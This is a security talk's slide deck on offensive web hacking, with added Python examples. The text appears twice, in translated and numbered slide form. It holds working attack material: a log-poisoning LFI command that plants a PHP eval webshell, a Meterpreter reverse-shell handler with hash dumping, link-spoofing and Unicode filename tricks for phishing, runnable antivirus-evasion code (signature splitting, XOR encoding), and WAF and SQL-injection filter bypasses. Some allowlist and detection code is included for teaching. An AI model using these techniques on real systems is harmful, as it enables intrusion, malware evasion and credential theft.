HACKING LIKE A BOSS
TIPS AND TRICKS FOR HACKING
Roberto Salgado
• Co-founder of Websec
• Provides information security solutions
• Pen-testing, training and monitoring
• Pythonista / Security Researcher
Contact
• rsalgado@websec.mx
• http://www.websec.mx
• http://www.twitter.com/@LightOS
• http://www.github.com/lightos
AGENDA
• DVWA
• Browser tools
• Finding other attack entry points
• Finding vulns through code auditing
• Phishing
• AV evasion
• Firewall evasion
PENTEST VS VULNERABILITY ASSESSMENT
• A vulnerability assessment lists every vulnerability found.
• A penetration test lists only the vulnerabilities that were used to gain access to the information, emphasizing the impact of exploitation rather than the full set of vulnerabilities.
DAMN VULNERABLE WEB APPLICATION
DVWA is a web application vulnerable to:
• Brute Force
• Command Execution
• Insecure Captcha
• File Inclusion
• SQLi
• SQLi Blind
• Upload
• XSS Reflected
• XSS Stored
LOCAL FILE INCLUSION
• LFI is a vulnerability that lets us read files on a system
• DEMO - http://localhost/lfi.php?file
LOCAL FILE INCLUSION
We prefer RCE. Files whose contents we can influence from outside (a request header, an environment variable, an e-mail), so that PHP code we plant in them runs when the vulnerable script includes them:
• access.log
• error.log
• /proc/self/environ
• /proc/self/status
• /proc/{id}/fd/2
• /proc/self/fd/2
• /var/spool/mail
LOCAL FILE INCLUSION
curl "http://site.com/index.php?page=../../../../../../../../proc/self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval($_GET[cmd]); ?>"
• /proc/self/fd/2 is the web server process's stderr, which normally points at the error log; the User-Agent is written there, the include() then executes it, and cmd is whatever PHP we pass on the query string
LOCAL FILE INCLUSION
• RCE not possible?
• In that case we have to look for sensitive files manually
• Look for configuration files or logs to escalate our access
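The traversal on the slide, traced offline, together with the check that stops it. This is an added example, not code from the talk: it models a PHP handler of the form include("/var/www/pages/" . $_GET['page']) in Python so the path resolution can be followed, then shows an allowlist-based replacement. The pages directory, the allowlist and the host name are assumptions; the request builder reproduces the curl command above.

```python
"""Path resolution behind an LFI, and an allowlist fix.

Added example (not code from the talk). It models a PHP handler like
    include("/var/www/pages/" . $_GET['page']);
in Python so the traversal from the slides can be traced offline, then shows
the check that stops it. PAGES_DIR and ALLOWED_PAGES are assumptions.
"""
import posixpath
from typing import Dict, Optional, Tuple
from urllib.parse import quote

PAGES_DIR = "/var/www/pages"                    # assumed directory of includable pages
ALLOWED_PAGES = {"home", "about", "contact"}    # assumed allowlist of real page names


def vulnerable_resolve(page: str) -> str:
    """Mirror of the insecure pattern: concatenate user input, then let the
    filesystem normalize it. Nothing stops '../' from leaving PAGES_DIR."""
    return posixpath.normpath(PAGES_DIR + "/" + page)


def hardened_resolve(page: str) -> Optional[str]:
    """Two independent checks: the name must be on the allowlist, and the
    normalized path must still sit under PAGES_DIR. Either alone suffices
    here; both together survive a future 'just add one more page' edit."""
    if page not in ALLOWED_PAGES:
        return None
    resolved = posixpath.normpath(posixpath.join(PAGES_DIR, page + ".php"))
    if not resolved.startswith(PAGES_DIR + "/"):
        return None
    return resolved


def log_poison_request(host: str, depth: int, cmd: str) -> Tuple[str, Dict[str, str]]:
    """Build the request from the slide: traverse to /proc/self/fd/2 and put
    PHP in the User-Agent so the error log carries our code. 'depth' is the
    number of '../' needed to reach '/', found by trial; the slide uses eight.
    Returns (url, headers) ready for any HTTP client."""
    traversal = "../" * depth + "proc/self/fd/2"
    url = f"http://{host}/index.php?page={traversal}&cmd={quote(cmd, safe='')}"
    headers = {"User-Agent": "<?php eval($_GET[cmd]); ?>"}
    return url, headers


if __name__ == "__main__":
    payload = "../" * 8 + "proc/self/fd/2"
    print("vulnerable:", vulnerable_resolve(payload))   # /proc/self/fd/2
    print("hardened:  ", hardened_resolve(payload))     # None
    print("hardened:  ", hardened_resolve("about"))     # /var/www/pages/about.php
    url, hdrs = log_poison_request("site.com", 8, "phpinfo();")
    print(url)
    print(hdrs)
```

The first request only plants the code in the log; the include() runs it. Note that `quote()` encodes the `();` in cmd, which curl on the slide sends raw; both forms reach PHP as the same string.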
TOOLS
TOOLS / LFI / PANOPTIC
• Filter the search by operating system, file type (conf or log), software, etc.
• Option to save the files found and strip the HTML from the file
• Supports threads, HTTP and SOCKS 4/5 proxies, random user-agent, etc.
TOOLS / LFI / PANOPTIC
• https://github.com/lightos/Panoptic
• git clone https://github.com/lightos/Panoptic.git
• https://github.com/lightos/Panoptic/archive/master.zip
TOOLS / PROXY / FIREFOX
• Tamper Data --- DEMO
• Hack Bar --- DEMO
• Burp Suite Pro
TOOLS / PROXY / CHROME
• Chrome Developer Tools (Ctrl+Shift+I or F12)
• Limited API == no equivalent of Tamper Data
• Burp Suite Pro to the rescue!
TOOLS / BURPSUITE PRO
• http://portswigger.net/burp/download.html
TOOLS / BURPSUITE PRO
• Spider / Crawler
• Live + Passive Scanner
• Repeater
• Intruder
DEMO
TOOLS / FUZZDB
• FUZZDB - list of strings to fuzz with
• https://code.google.com/p/fuzzdb/
TOOLS / FUZZDB
svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only
REVERSE IP LOOKUP
• We found no vulnerabilities/entry point on the site
• Shared hosting? Other sites on the same IP may be weaker and offer a way onto the same server
REVERSE IP LOOKUP
• http://www.ip2hosts.com/
REVERSE IP LOOKUP
• Android app
• https://play.google.com/store/apps/details?id=websec.ip2hosts&hl=es
DEMO
DNS LOOKUP
• Dictionary attack
• Brute-force attack
• Zone transfer
• SOA (Start of Authority) through misconfigured DNS
DNS LOOKUP
• Fierce - RSnake
• DNSMap - GNUCitizen
• DNS_enum - MSF
• DNS-Discovery
• DNSRecon
• DNSRecord
• DnsWalk
GOOGLE HACKING
• Focus the search on our victim
• site:our-target.com.mx
• Find files, logins, additional domains
• Demo
ADMIN FINDER
• How to find the admin page?
• Google dork: admin finder
• Admin finder: dictionary attack
FINDING VULNS THROUGH CODE AUDITING
FINDING VULNS IN A HURRY
grep -R -H -n -B 2 -A 2 -i -E '\$_(GET|POST)' . > ../vulns.txt
• Recursive
• File name
• Nu…
-E is needed for the alternation: in grep's default syntax the bar is a literal character and the pattern matches nothing, and the $ is escaped so it is not read as an anchor.
DEMO
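One step up from the grep above, as an added example that is not from the talk: the grep lists every line that touches $_GET/$_POST; this script keeps only the lines where a user-controlled superglobal sits on the same line as a dangerous sink (include, eval, system, SQL ...), which is where the LFI, RCE and SQLi findings of the earlier slides usually come from. The PHP it scans is constructed sample input, and same-line matching is a deliberate simplification: taint that travels through a variable is missed, which the sample shows on purpose.

```python
"""Quick source-to-sink triage of PHP code, one step up from grep.

Added example, not from the talk. Flags lines where a user-controlled
superglobal and a known dangerous sink appear together. Single-line matching
is a deliberate simplification: real taint flows through variables, so treat
the output as a worklist, not a verdict. SAMPLE_PHP is constructed input.
"""
import re
from typing import Dict, List, Tuple

SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b", re.I)

# sink regex -> vulnerability class it usually indicates
SINKS: Dict[str, str] = {
    r"\binclude(_once)?\b": "LFI/RFI",
    r"\brequire(_once)?\b": "LFI/RFI",
    r"\beval\s*\(": "RCE",
    r"\b(system|exec|shell_exec|passthru|popen)\s*\(": "command injection",
    r"\bmysqli?_query\s*\(": "SQLi",
    r"\bunserialize\s*\(": "object injection",
}

SAMPLE_PHP = r"""<?php
// constructed sample, modelled on DVWA-style handlers
$page = $_GET['page'];
include("pages/" . $page);
$name = htmlspecialchars($_POST['name']);
echo "Hello $name";
system("ping -c 1 " . $_REQUEST['ip']);
$r = mysql_query("SELECT * FROM users WHERE id=" . $_GET['id']);
eval($_COOKIE['cmd']);
$safe = (int) $_GET['n'];
"""


def find_candidates(php_source: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, vuln_class, line) for lines containing both a
    superglobal source and a known sink. Lines that only read a source (the
    htmlspecialchars line) are skipped, and so is the include() on line 4,
    because its tainted input arrives through $page: that is the gap grep
    and this script share, and the reason the output is only a worklist."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        if not SOURCES.search(line):
            continue
        for sink_re, vuln in SINKS.items():
            if re.search(sink_re, line, re.I):
                hits.append((lineno, vuln, line.strip()))
                break
    return hits


if __name__ == "__main__":
    for lineno, vuln, line in find_candidates(SAMPLE_PHP):
        print(f"{lineno:>3}  {vuln:<18} {line}")
```

Run it against a checkout with `find . -name '*.php'` feeding the file contents in; the missed include() on line 4 is the argument for following each flagged variable a few lines up, exactly what the -B/-A context in the grep is for.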
PHISHING
URL SPOOFING
• Pedro Joaquín showed this technique
• <a href="https://www.google.com/" onmousedown="this.href='http://websec…
• The status bar shows the href the user hovers over (google.com); the onmousedown handler swaps it for the attacker's URL in the instant before the click completes
DEMO
UNICODE ATTACKS
• Unicode continues beyond the ASCII range
• Left-To-Right Override
• U+202D
• Right-To-Left Override
• U+202E
LIVE DEMO
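The Right-To-Left Override trick from the slide, worked through in code. This is an added example, not the live demo: it builds a file name that is really `report_` + U+202E + `fdp.exe`, shows what a bidi-aware file manager or mail client displays, what the OS actually treats as the extension, and the check an upload handler or mail gateway can use to reject such names. The file names are constructed; as_displayed() approximates the rendering rather than implementing the full Unicode Bidi algorithm.

```python
"""Right-to-Left Override in file names: what the user sees vs. what runs.

Added example, not from the talk. U+202E (RLO) makes a bidi-aware renderer
paint everything after it right-to-left, so a file really named
'report_' + RLO + 'fdp.exe' is displayed as 'report_exe.pdf'. File names are
constructed; as_displayed() is an approximation, not a full Bidi algorithm.
"""
import unicodedata

LRO = "\u202d"  # Left-To-Right Override (U+202D on the slide)
RLO = "\u202e"  # Right-To-Left Override (U+202E on the slide)
# Bidi classes of the explicit formatting characters: embeddings, overrides,
# the PDF terminator and the isolates added in Unicode 6.3.
BIDI_FORMATTING = {"LRE", "RLE", "LRO", "RLO", "PDF", "LRI", "RLI", "FSI", "PDI"}


def spoofed_name(visible_prefix: str, displayed_suffix: str) -> str:
    """Build the attacker's file name. The suffix the victim should *see* is
    stored reversed after an RLO, so the override flips it back for the eye:
    spoofed_name('report_', 'exe.pdf') is really 'report_\\u202efdp.exe'."""
    return visible_prefix + RLO + displayed_suffix[::-1]


def as_displayed(name: str) -> str:
    """Approximate what a bidi-aware UI shows: the text after an RLO, up to
    the end of the string (no PDF terminator), is drawn reversed."""
    head, sep, tail = name.partition(RLO)
    return head + tail[::-1] if sep else name


def real_extension(name: str) -> str:
    """What the OS actually dispatches on: the text after the last dot once
    the invisible formatting characters are dropped."""
    cleaned = "".join(
        ch for ch in name if unicodedata.bidirectional(ch) not in BIDI_FORMATTING
    )
    return cleaned.rsplit(".", 1)[-1].lower()


def has_bidi_override(name: str) -> bool:
    """Detection check for an upload handler or mail gateway: ordinary file
    names never need explicit bidi formatting characters, so any of them is
    a reason to reject or rename the file."""
    return any(unicodedata.bidirectional(ch) in BIDI_FORMATTING for ch in name)


if __name__ == "__main__":
    name = spoofed_name("report_", "exe.pdf")
    print("displayed:", as_displayed(name))        # report_exe.pdf
    print("real ext: ", real_extension(name))      # exe
    print("flag it:  ", has_bidi_override(name))   # True
```

Whether the victim sees `report_exe.pdf` or the raw `report_?fdp.exe` depends on the renderer; the check in has_bidi_override() does not depend on the rendering at all, which is why it belongs at the ingress point rather than in the UI.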
PHISHING / WRONG TLD
• They register .com.mx but not .com
• .net, .org, .co, .ca, .mx
• www.campus-party.com.mx - exists
…
DOMAIN SQUATTING / BIT SQUATTING
• Cosmic rays
• The device overheats
• Happens around 600,000 times a day
• A single flipped bit in memory changes one character of a stored domain name, so the request goes to a domain one bit away from the real one; the attacker registers those neighbours in advance
Tools…
MSF AUTOPWNAGE
Meterpreter commands:
• Screenshot (screenshot)
• Webcam photo (webcam_snap)
• System information (sysinfo)
• …
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession f…
LIVE DEMO
IN A MOMENT…
ANTIVIRUS EVASION
• Dsplit
• Public crypters
• XOR crypter
ANTIVIRUS EVASION / DSPLIT
• We split the file into incrementally larger chunks of bytes
• We scan each generated file
• We go back… (the first chunk the AV flags ends inside the bytes its signature matches, which tells us what to change)
ANTIVIRUS EVASION / PUBLIC CRYPTER
• http://foro.udtools.net
ANTIVIRUS EVASION / XOR CRYPTER
• Python tool that uses a C template
• XORs with a random byte and adds…
LIVE DEMO
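The two techniques of this section, dsplit-style signature location and XOR encoding, run end to end against a stand-in scanner. This is an added example and not the speaker's tool: there is no real AV here, a constructed byte-pattern matcher plays the engine so both steps work offline, and the payload and signature bytes are invented. Step one cuts the file into growing prefixes and scans each, narrowing to the exact offset where detection starts; step two XORs the whole payload with a key byte, prepends the key for a decode stub, and checks that the scanner no longer matches and that decoding round-trips.

```python
"""Locating an AV signature dsplit-style, then XOR-encoding past it.

Added example, not the talk's tool. A constructed byte-pattern matcher
stands in for the AV engine so both steps run offline. PAYLOAD and
SIGNATURE are invented sample data.
"""
import os
from typing import Optional

# Stand-in for the AV engine: the byte pattern our "scanner" looks for.
SIGNATURE = b"\xfc\xe8\x82\x00\x00\x00"          # constructed, not a real signature

# Constructed sample "binary": filler, the signature at offset 40, more filler.
PAYLOAD = b"\x90" * 40 + SIGNATURE + b"\xcc" * 60


def scanner_flags(data: bytes) -> bool:
    """Pretend AV: detection == signature bytes present anywhere."""
    return SIGNATURE in data


def dsplit_locate(data: bytes, step: int = 8) -> Optional[int]:
    """Return the offset one past the last byte of the detected signature.

    Emit data[:step], data[:2*step], ... and scan each. The first chunk that
    trips the scanner contains the end of the signature; shrinking it byte by
    byte then pins the exact offset. Returns None if nothing is flagged."""
    first_hit = None
    for end in range(step, len(data) + step, step):
        if scanner_flags(data[:end]):
            first_hit = min(end, len(data))
            break
    if first_hit is None:
        return None
    # Refine within the last step: the smallest prefix that is still flagged.
    for end in range(first_hit - step + 1, first_hit + 1):
        if scanner_flags(data[:end]):
            return end
    return first_hit


def xor_encode(data: bytes, key: Optional[int] = None) -> bytes:
    """Return the key byte followed by data XOR key (the output layout assumed
    here for the decode stub). A random key changes the bytes every build;
    the stub only needs the first byte to recover the original."""
    if key is None:
        key = os.urandom(1)[0] or 1       # avoid key 0, which would be a no-op
    return bytes([key]) + bytes(b ^ key for b in data)


def xor_decode(blob: bytes) -> bytes:
    """Inverse of xor_encode: strip the key byte and XOR it back."""
    key = blob[0]
    return bytes(b ^ key for b in blob[1:])


if __name__ == "__main__":
    end = dsplit_locate(PAYLOAD)
    print("signature ends at offset", end,
          "-> bytes", PAYLOAD[end - len(SIGNATURE):end].hex())
    enc = xor_encode(PAYLOAD, key=0x5A)
    print("flagged after XOR:", scanner_flags(enc))   # False
    print("round-trip ok:", xor_decode(enc) == PAYLOAD)
```

The XOR step defeats only a static byte-pattern match: the decode stub itself is constant and becomes the next signature, and any engine that emulates the stub sees the original bytes. That is why the public crypters on the previous slide go stale and why the technique is paired with dsplit rather than used blind.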
FIREWALL EVASION
Payload references for getting past WAF filters:
• HTML5 Security Cheatsheet
• http://html5sec.org
• SQL Injection Knowledge Base
• http:/…
FIREWALL EVASION
Meterpreter:
• Use a reverse TCP payload (the victim connects out to us)
• Use ports that are allowed outbound: 53, 80, 443
FIREWALL EVASION
• Original URL:
• index.php?id=1
• Modified URL:
• index.php?id%00 WE CAN PUT WHATEVER WE WANT HERE…
• Some filters stop inspecting the parameter at the null byte (%00) while the application behind them keeps reading it
SQLMAP TAMPER SCRIPTS
• percentage.py
• space2hash.py
• space2dash.py
• space2morehash.py
• space2mssqlhash.py
• space2mys…
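What a sqlmap tamper script actually does, written out stand-alone. This is an added example and not one of the sqlmap scripts named above: a sqlmap tamper module exposes tamper(payload, **kwargs) and returns the rewritten payload, and sqlmap applies the modules passed to --tamper in turn. The two functions reproduce the ideas behind two names on the slide so the effect can be inspected offline, a percentage-style rewrite (a `%` before every alphanumeric outside quotes, which IIS/ASP tolerates and naive keyword filters do not) and a space2dash-style rewrite (each space outside quotes becomes `--`, random letters and a URL-encoded newline, i.e. a line comment). A real module would also import PRIORITY from lib.core.enums and set __priority__; that is left out so this runs without sqlmap.

```python
"""What a sqlmap tamper script does, written out stand-alone.

Added example; not the sqlmap scripts named on the slide. Reproduces the
ideas behind percentage.py and space2dash.py without depending on sqlmap.
"""
import random
import re
import string
from typing import Callable, Optional

QUOTED = re.compile(r"('[^']*')")   # single-quoted SQL string literals


def _map_unquoted(payload: str, fn: Callable[[str], str]) -> str:
    """Apply fn to the parts of the payload outside quotes; leave literals as
    they are. re.split with one capture group alternates: even indices are
    outside quotes, odd indices are the literals themselves."""
    parts = QUOTED.split(payload)
    return "".join(fn(p) if i % 2 == 0 else p for i, p in enumerate(parts))


def tamper_percentage(payload: str, **kwargs) -> str:
    """percentage-style: 'SELECT id' -> '%S%E%L%E%C%T %i%d'.
    Only useful where the server strips stray percent signs (ASP/IIS)."""
    return _map_unquoted(
        payload, lambda s: "".join("%" + c if c.isalnum() else c for c in s)
    )


def tamper_space2dash(payload: str, seed: Optional[int] = None, **kwargs) -> str:
    """space2dash-style: 'UNION SELECT' -> 'UNION--kTqWzLp%0ASELECT'.
    MSSQL and SQLite treat '--anything<newline>' as a comment. MySQL needs
    whitespace right after '--', so this variant does not work there (sqlmap
    ships space2mysqldash for that). 'seed' only makes the output reproducible;
    a real run wants fresh junk per request so the filter cannot learn it."""
    rng = random.Random(seed)

    def replace_spaces(s: str) -> str:
        out = []
        for c in s:
            if c == " ":
                junk = "".join(rng.choice(string.ascii_letters)
                               for _ in range(rng.randint(6, 12)))
                out.append("--" + junk + "%0A")
            else:
                out.append(c)
        return "".join(out)

    return _map_unquoted(payload, replace_spaces)


if __name__ == "__main__":
    p = "1 UNION SELECT 'a b',version()"
    print(tamper_percentage(p))
    print(tamper_space2dash(p, seed=7))
```

Quote awareness is the part people get wrong when they roll their own: rewriting inside `'a b'` changes the value the query compares against, so a bypass that "works" returns the wrong rows. Chaining is just function composition, which is what `--tamper=a,b` does inside sqlmap.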
END
@LIGHTOS
RSALGADO@WEBSEC.MX
HTTP://WWW.WEBSEC.MX
CPMX5 - Hacking like a boss by Roberto Salgado
Sometimes the difference between successfully getting into a remote system and failing is knowing a tool, a command line, or even an AV/firewall evasion technique. This talk offers tips and tricks for hacking "like a Boss" that will give you an edge while auditing a system.

Speaker: Roberto Salgado. Technical director and co-founder of Websec México. Roberto has participated in and contributed to major projects such as ModSecurity, PHPIDS, sqlmap and the book "Web Application Obfuscation". He created the SQL Injection Knowledge Base, one of the most complete references available on the web, and Panoptic, a tool that searches for common file paths through LFI-type vulnerabilities. He also developed the fastest method for extracting data from databases vulnerable to blind injection.
  1. 1. HACKING LIKE A BOSS TIPS Y TRUCOS PARA HACKEAR
  2. 2. Roberto Salgado • Co-founder of Websec • Provide information security solutions • Pen-testing, training and monitoring • Pythonista / Security Researcher Contacto • rsalgado@websec.mx • http://www.websec.mx • http://www.twitter.com/@LightOS • http://www.github.com/lightos
  3. 3. TEMARIO • DVWA • Herramientas para el browser • Buscar otras entradas de ataque • Encontrar vulns con auditoria de código • Phishing • Evasión de AV • Evasión de Firewall
  4. 4. PENTEST VS AUDITORIA DE VULNERABILIDADES • En la auditoría de vulnerabilidades se listan todas las vulnerabilidades encontradas. • En la prueba de penetración solo se listan las vulnerabilidades que se utilizaron para obtener acceso a la información, haciendo énfasis en el impacto de la explotación y no en la totalidad de las vulnerabilidades.
  5. 5. DAMN VULNERABLE WEB APPLICATION DVWA es una aplicación web vulnerable a: • Brute Force • Command Execution • Insecure Captcha • File Inclusion • SQLi • SQLi Blind • Upload • XSS Reflected • XSS Stored
  6. 6. LOCAL FILE INCLUSION • LFI es una vulnerabilidad que nos permite leer archivos en un sistema • DEMO - http://localhost/lfi.php?file
  7. 7. LOCAL FILE INCLUSION Preferimos RCE: • access.log • error.log • /proc/self/environ • /proc/self/status • /proc/{id}/fd/2 • /proc/self/fd/2 • /var/spool/mail
  8. 8. LOCAL FILE INCLUSION curl "http://site.com/index.php?page= ../../../../../../../../proc/self/fd/2&cmd=phpinfo();“ -H "User-Agent: <?php eval($_GET[cmd]); ?>"
  9. 9. LOCAL FILE INCLUSION • RCE No es posible? • En ese caso tenemos que buscar archivos confidenciales manualmente • Buscar archivos de configuración o bitácoras para elevar nuestro acceso
  10. TOOLS
  11. TOOLS / LFI / PANOPTIC
     • Filter the search by operating system, file type (conf or log), software, etc.
     • Option to save the files found and strip the HTML from the file
     • Supports threads, HTTP and SOCKS 4/5 proxies, random user-agent, etc.
  12. TOOLS / LFI / PANOPTIC
     • https://github.com/lightos/Panoptic
     • git clone https://github.com/lightos/Panoptic.git
     • https://github.com/lightos/Panoptic/archive/master.zip
  13-14. TOOLS / PROXY / FIREFOX
     • Tamper Data --- DEMO
     • Hack Bar --- DEMO
     • Burp Suite Pro
  15. TOOLS / PROXY / CHROME
     • Chrome Developer Tools (Ctrl+Shift+I or F12)
     • Limited API == no equivalent to Tamper Data
     • Burp Suite Pro to the rescue!
  16. TOOLS / BURPSUITE PRO
     • http://portswigger.net/burp/download.html
  17. TOOLS / BURPSUITE PRO
     • Spider / Crawler
     • Live + Passive Scanner
     • Repeater
     • Intruder
  18. DEMO
  19. TOOLS / FUZZDB
     • FUZZDB - a list of strings for fuzzing
     • https://code.google.com/p/fuzzdb/
  20. TOOLS / FUZZDB
     svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only
  21. REVERSE IP LOOKUP
     • We found no vulnerabilities/entry point on a site
     • Shared hosting?
  22. REVERSE IP LOOKUP
     • http://www.ip2hosts.com/
  23. REVERSE IP LOOKUP
     • Android app
     • https://play.google.com/store/apps/details?id=websec.ip2hosts&hl=es
  24. DEMO
  25. DNS LOOKUP
     • Dictionary attack
     • Brute-force attack
     • Zone transfer
     • SOA (Start of Authority) through a misconfigured DNS
  26. DNS LOOKUP
     • Fierce - RSnake
     • DNSMap - GNUCitizen
     • DNS_enum - MSF
     • DNS-Discovery
     • DNSRecon
     • DNSRecord
     • DnsWalk
  27. GOOGLE HACKING
     • Focus the search on our target
     • site:nuestro-objetivo.com.com.mx
     • Find files, logins, additional domains
     • Demo
  28. ADMIN FINDER
     • How do we find the admin page?
     • Google dork: admin finder
     • Admin finder: dictionary attack
  29. FINDING VULNS THROUGH CODE AUDIT
  30-40. FINDING VULNS THROUGH CODE AUDIT
     grep -R -H -n -B 2 -A 2 -i -E '\$_GET|\$_POST' . > ../vulns.txt
     • Recursive
     • File name
     • Line number
     • Two lines before
     • Two lines after
     • Case-insensitive
     • Search for GET or POST (-E is required: in grep's default basic syntax the | is a literal character and the pattern matches nothing; the $ is escaped so it is not read as an anchor)
     • In the current directory
     • Save the results to vulns.txt
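A Python cousin of the grep one-liner above, added here as an example (not code from the talk or from Panoptic): it lists the lines that read a PHP superglobal with grep-style context and, unlike grep, flags the ones where a dangerous function appears on that line or within the next `context` lines. The sink list and the sample PHP are constructed.

```python
# Added example (not from the talk): superglobal-to-sink scan over PHP sources.
import re
from pathlib import Path

SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE)
# Functions where attacker-controlled input is most dangerous (constructed list).
SINKS = re.compile(r"\b(include|include_once|require|require_once|eval|system|exec|"
                   r"shell_exec|passthru|mysql_query|mysqli_query|unserialize)\b",
                   re.IGNORECASE)

def scan_source(text, name="<string>", context=2):
    """One finding per line that reads a superglobal (1-based line number, like grep -n)."""
    lines = text.splitlines()
    findings = []
    for idx, line in enumerate(lines):
        if not SOURCES.search(line):
            continue
        sink = None
        for later in lines[idx: idx + context + 1]:  # this line and the next `context`
            m = SINKS.search(later)
            if m:
                sink = m.group(0).lower()
                break
        findings.append({"file": name, "line": idx + 1, "sink": sink,
                         "context": lines[max(0, idx - context): idx + context + 1]})
    return findings

def scan_dir(root):
    """Recurse like grep -R, restricted to .php files."""
    results = []
    for path in Path(root).rglob("*.php"):
        results += scan_source(path.read_text(errors="replace"), str(path))
    return results

# Constructed sample in the style of DVWA: one include sink, one SQL sink.
SAMPLE = """<?php
$page = $_GET['page'];
include($page . '.php');
$name = htmlspecialchars($_POST['name']);
echo "Hello $name";
$q = "SELECT * FROM users WHERE id=" . $_get['id'];
$r = mysql_query($q);
"""
if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        print(f"{f['file']}:{f['line']} sink={f['sink']}")
        print("\n".join("    " + l for l in f["context"]))
```

Run `scan_dir(".")` on a checkout for the equivalent of the grep command; a finding with a sink is the place to start reading, one without is still input that needs validating.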
  41. DEMO
  42. PHISHING
  43. URL SPOOFING
     • Pedro Joaquín showed this technique
     • <a href="https://www.google.com/" onmousedown="this.href='http://websec.mx'">https://www.google.com/</a>
  44. DEMO
  45. UNICODE ATTACKS
     • Continuation of the ASCII range
     • Left-To-Right Override
     • U+202D
     • Right-To-Left Override
     • U+202E
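Added example, not from the talk: a small Python check that flags the bidirectional override code points named on the slide (U+202D, U+202E) and their relatives in a filename or URL, and shows how a naive viewer would display the string. The sample names are constructed.

```python
# Added example (not from the talk): detect bidi override characters in names/URLs.
import unicodedata

# Bidi control characters that reorder or hide text in most renderers.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}


def find_bidi_controls(text):
    """Return (index, U+XXXX, short name) for every bidi control in text."""
    return [(i, f"U+{ord(ch):04X}", BIDI_CONTROLS[ch])
            for i, ch in enumerate(text) if ch in BIDI_CONTROLS]


def is_suspicious_name(text):
    """True if text contains a bidi control or any other invisible format char
    (Unicode category Cf, e.g. zero-width space), which a filename or link
    text almost never needs."""
    return any(ch in BIDI_CONTROLS or unicodedata.category(ch) == "Cf"
               for ch in text)


def rendered_form(text):
    """Approximate what a naive viewer shows: everything after an RLO is drawn
    right-to-left. Handles a single override, enough for the filename trick."""
    if "\u202e" not in text:
        return text
    head, tail = text.split("\u202e", 1)
    return head + tail[::-1]


# Constructed: "invoice" + RLO + "fdp.exe" is displayed as "invoiceexe.pdf"
# although the real extension is .exe.
SAMPLE = "invoice\u202efdp.exe"

if __name__ == "__main__":
    print(find_bidi_controls(SAMPLE), rendered_form(SAMPLE))
```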
  46. LIVE DEMO
  47. PHISHING / WRONG TLD
     • They register .com.mx but not .com
     • .net, .org, .co, .ca, .mx
     • www.campus-party.com.mx - exists
     • www.campus-party.net - does not exist
     • www.campus-party.com - for sale
  48. DOMAIN SQUATTING / BIT SQUATTING
     • Cosmic rays
     • The device overheats
     • Happens about 600,000 times a day
     Tool:
     • URLCRAZY
  49. MSF AUTOPWNAGE
     • Screenshot (screenshot)
     • Webcam photo (webcam_snap)
     • System information (sysinfo)
     • Get the IP (ipconfig)
     • Network routing (route)
     • Current folder (pwd)
     • List files (ls)
     • Dump hashes (run hashdump)
     • Close the session
  50. use exploit/multi/handler
     set PAYLOAD windows/meterpreter/reverse_tcp
     set LHOST 0.0.0.0
     set LPORT 4444
     set ExitOnSession false
     spool C:\Users\LightOS\Desktop\msf-output.log
     exploit -j
  51. LIVE DEMO
  52. LIVE DEMO IN A MOMENT…
  53. AV EVASION
  54. ANTIVIRUS EVASION
     • Dsplit
     • Public crypters
     • XOR crypter
  55. ANTIVIRUS EVASION / DSPLIT
     • We incrementally split the file into byte-sized chunks
     • We scan each generated file
     • We split again the file that is detected, together with the one after it
     • We repeat the process until the difference is down to 1 byte
     • We modify that byte to change the signature and evade detection
  56. ANTIVIRUS EVASION / PUBLIC CRYPTER
     • http://foro.udtools.net
  57. ANTIVIRUS EVASION / XOR CRYPTER
     • Python tool that uses a C template
     • XORs with a random byte and adds padding to change the size
     • Loads the shellcode and performs the XOR operation at run time
  58. LIVE DEMO
  59. FIREWALL EVASION
     • HTML5 Security Cheatsheet
     • http://html5sec.org
     • SQL Injection Knowledge Base
     • http://www.websec.ca/kb/sql_injection
  60. FIREWALL EVASION
  61. FIREWALL EVASION
     Meterpreter:
     • Use a reverse TCP
     • Use allowed ports: 53, 80, 443
  62. FIREWALL EVASION
     • Original URL:
     • index.php?id=1
     • Modified URL:
     • index.php?id%00 HERE WE CAN PUT WHATEVER WE WANT=1
     • Try bypasses:
     • index.php?id%00"><script>alert(0)</script>=1
  63. SQLMAP TAMPER SCRIPTS
     • percentage.py
     • space2hash.py
     • space2dash.py
     • space2morehash.py
     • space2mssqlhash.py
     • space2mysqldash.py
     • space2mssqlblank.py
     • charencode.py
     • charunicodeencode.py
     • chardoubleencode.py
  64. END
     @LIGHTOS
     RSALGADO@WEBSEC.MX
     HTTP://WWW.WEBSEC.MX
